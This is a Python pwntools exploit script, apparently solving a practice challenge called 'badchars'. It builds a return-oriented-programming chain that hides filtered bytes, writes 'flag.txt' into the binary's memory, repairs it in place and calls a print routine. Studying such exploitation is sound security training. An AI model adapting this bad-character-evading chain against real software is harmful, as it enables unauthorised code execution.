#!/usr/bin/env python3
from pwn import *
from time import sleep


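def strfixandcopy(dest, string, badchars, payload):
    """Append a ROP chain that writes ``string`` to ``dest`` without sending any bad byte.

    Every byte of the string that is a bad character is decremented until it is
    clean (wrapping at 0x00), the disguised string is stored 8 bytes at a time with
    the r12/r13 move gadget, and each disguised byte is then repaired in place with
    the add gadget (r14 = amount subtracted, r15 = the byte's address).  A string
    whose length is not a multiple of 8 is NUL-padded so the move gadget always has
    a full qword to store; the pad bytes go through the same disguise/repair step.

    Args:
        dest: address the string is written to.
        string: ``str`` (latin-1 range) or bytes-like text to place at ``dest``.
        badchars: ``str`` or bytes-like set of byte values the target filters.
        payload: chain built so far; only the part appended here is checked for
            bad bytes -- the caller's prefix is the caller's responsibility.

    Returns:
        ``payload`` with the write-and-repair chain appended.

    Raises:
        ValueError: ``string`` is empty, contains a character outside the byte
            range, cannot be disguised (all 256 byte values are bad), or the chain
            this function emits (gadget addresses, ``dest``, popped values) would
            itself contain a bad byte and be mangled by the target's filter.
    """
    # Gadget addresses in ./badchars (the original comments name what they do).
    POP_R12_R13_R14_R15 = 0x000000000040069c  # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
    MOV_R13_R12 = 0x0000000000400634          # stores the qword in r12 at [r13] ("moves fixed string")
    POP_R14_R15 = 0x00000000004006a0          # pop r14 ; pop r15
    ADD_R15_R14 = 0x000000000040062c          # adds r14 to the byte at [r15] ("does the adding")
    # NOTE(review): the 0x00 -> 0xff wrap below assumes the add gadget is byte-wide
    # (add byte [r15], r14b); a qword add would carry into the next byte. Confirm.

    def qword(value):
        # x86_64 is little-endian, so this equals p64() without depending on the
        # global pwntools context; it also keeps this helper usable on its own.
        return value.to_bytes(8, "little")

    raw = string.encode("latin-1") if isinstance(string, str) else bytes(string)
    bad = badchars.encode("latin-1", "ignore") if isinstance(badchars, str) else bytes(badchars)
    if not raw:
        raise ValueError("nothing to write")
    # Pad to a whole number of qwords; the move gadget writes 8 bytes regardless.
    raw += b"\x00" * (-len(raw) % 8)

    disguised = bytearray()
    repairs = []  # (offset within the string, amount the add gadget must add back)
    for offset, byte in enumerate(raw):
        delta = 0
        while byte in bad:
            if delta == 255:
                raise ValueError("every byte value is a bad character; nothing can be disguised")
            byte = (byte - 1) & 0xFF
            delta += 1
        disguised.append(byte)
        if delta:
            repairs.append((offset, delta))

    parts = []
    # One store per qword: r12 = data, r13 = address, r14/r15 = filler for the pop gadget.
    for i in range(0, len(disguised), 8):
        parts.append(qword(POP_R12_R13_R14_R15))
        parts.append(bytes(disguised[i:i + 8]))  # r12
        parts.append(qword(dest + i))            # r13
        parts.append(qword(1))                   # r14
        parts.append(qword(1))                   # r15
        parts.append(qword(MOV_R13_R12))
    # One add per disguised byte: r14 = addend, r15 = address of the byte.
    for offset, delta in repairs:
        parts.append(qword(POP_R14_R15))
        parts.append(qword(delta))
        parts.append(qword(dest + offset))
        parts.append(qword(ADD_R15_R14))
    chain = b"".join(parts)

    # The filter sees the whole input, not just the string: a bad byte inside a
    # gadget address, in dest, or in a popped value silently breaks the chain.
    if any(b in bad for b in chain):
        raise ValueError("chain contains a bad byte: relocate the string or choose other gadgets")
    return payload + chain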
            
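def main():
    """Build the chain, send it to ./badchars and print whatever the target answers."""
    # Filler up to the saved return address.  NOTE(review): 'a' is itself one of the
    # bad characters; this filler is assumed harmless if the target mangles it since
    # it sits below the saved return address -- confirm against the binary.
    payload = b"a" * 40
    string_addr = 0x601be0  # writable location the string is copied to, then passed as the argument
    payload = strfixandcopy(string_addr, "flag.txt", "xga.", payload)
    # Tail of the chain: presumably a gadget that pops the string address into the
    # first-argument register, followed by the function that prints the file.
    # Neither is documented here -- confirm against the binary's gadgets/symbols.
    payload += p64(0x00000000004006a3)
    payload += p64(string_addr)
    payload += p64(0x0000000000400510)
    # sendline() appends a second newline; kept so the bytes sent match the original.
    payload += b"\n"

    prog = process("./badchars")
    try:
        prog.sendline(payload)
        # Wait for the target's output (bounded by the timeout) instead of a fixed
        # sleep that raced it; never block forever on a crashed or silent process.
        output = prog.recvall(timeout=2)
        # A stray non-UTF-8 byte in the output must not crash the exploit.
        print(output.decode("utf-8", errors="replace"))
    finally:
        prog.close()


if __name__ == "__main__":
    main()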